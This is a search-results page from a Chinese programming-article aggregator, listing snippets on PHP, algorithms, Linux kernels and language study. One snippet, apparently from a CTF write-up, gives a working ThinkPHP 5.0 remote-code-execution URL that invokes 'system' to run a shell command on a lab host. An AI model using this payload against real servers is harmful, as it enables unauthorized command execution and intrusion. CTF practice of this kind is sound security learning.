码迷,mamicode.com
首页 >  
搜索关键字:think    ( 1909个结果
微信小程序客服智能回复示例代码(PHP)
业务逻辑文件编写 use think\Action; //自己封装的curl方法,详情看附录 define("TOKEN", "你设置的token"); class Customer extends Controller { //校验服务器地址URL public function checkSer ...
分类:微信   时间:2020-02-14 11:07:40    阅读次数:113
0214 像魔术师的口袋,什么招数都有
1.复习代码 .复习代码 LC 322 322. Coin Change Medium 2970100Add to ListShare You are given coins of different denominations and a total amount of money amount. ...
分类:其他好文   时间:2020-02-14 10:53:04    阅读次数:94
更改CRT命令行颜色
把此目录(没有就手动创建)和文件复制到SecureCRT的配置目录-C:\Users\think\AppData\Roaming\VanDyke\Config\keywords中即可更改命令颜色配置文件为colorful-network.ini文件内容如下D:"MatchCase"=00000000Z:"KeywordListV2"=00000016&quo
分类:其他好文   时间:2020-02-11 09:17:32    阅读次数:514
Lesson 2 Spare that spider
How much of each year do spiders killing insects? Why, you may wonder, should spiders be our friends? Because they destroy so many insects, and insect ...
分类:其他好文   时间:2020-02-08 17:49:56    阅读次数:83
汉语-词语-怀念:百科
怀念是一个汉语词语,读音为huái niàn,指思念、关心。也有想念的意思通常用于已经过去的事物。出自《元典章新集·户部·差役》。 1、 中文名:怀念外文名:think of拼 音:huái niàn词 性:动词解 释:思念;关心 目录 1 基本信息 2 怀念的价值 3 理性解释 4 引证解释 基本 ...
分类:其他好文   时间:2020-02-07 11:09:12    阅读次数:89
Deepin内核升级方法
Deepin内核获取(联网模式): 1、获取当前内核版本 think@think-PC:~/Desktop$ sudo uname -r 4.15.0-30deepin-generic think@think-PC:~/Desktop$ sudo uname -a Linux think-PC 4. ...
分类:其他好文   时间:2020-02-06 16:44:02    阅读次数:1531
相同类、不同类调用变量、常量及方法
<?phpnamespace app\admin\controller;use think\Controller;class Test extends controller{ const name='PHP软件开发工程师'; private $a='1'; public function index ...
分类:其他好文   时间:2020-02-05 13:50:07    阅读次数:74
【干货】零基础30分钟让你拥有一个完整属于自己的短视频APP系统
目录 一、附言: 1 二、购买域名和购买服务器: 2 三、搭建服务器环境: 5 四、配置APP前端部分: 8 1.工具以及文件准备: 9 2.配置后端接口地址 11 3.配置APP启动图和启动图标 12 五、搭建APP后端部分 13 步骤,一步步输入并且回车。 13 1. 登录方才已经安装好的宝塔软 ...
分类:移动开发   时间:2020-02-04 12:30:45    阅读次数:175
2020-2-2摸底测试B 贪心
题面: Vova's house is an array consisting of n elements (yeah, this is the first problem, I think, where someone lives in the array). There are heaters ...
分类:其他好文   时间:2020-02-03 11:57:55    阅读次数:76
ThinkPHP 5.0 版本存在getshell漏洞 php_rce
查找flag:http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%2 ...
分类:Web程序   时间:2020-01-28 09:25:46    阅读次数:147
1909条   上一页 1 ... 15 16 17 18 19 ... 191 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!